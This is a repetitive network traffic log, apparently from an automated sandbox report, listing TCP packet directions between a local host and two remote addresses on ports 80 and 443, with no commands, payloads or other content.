Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
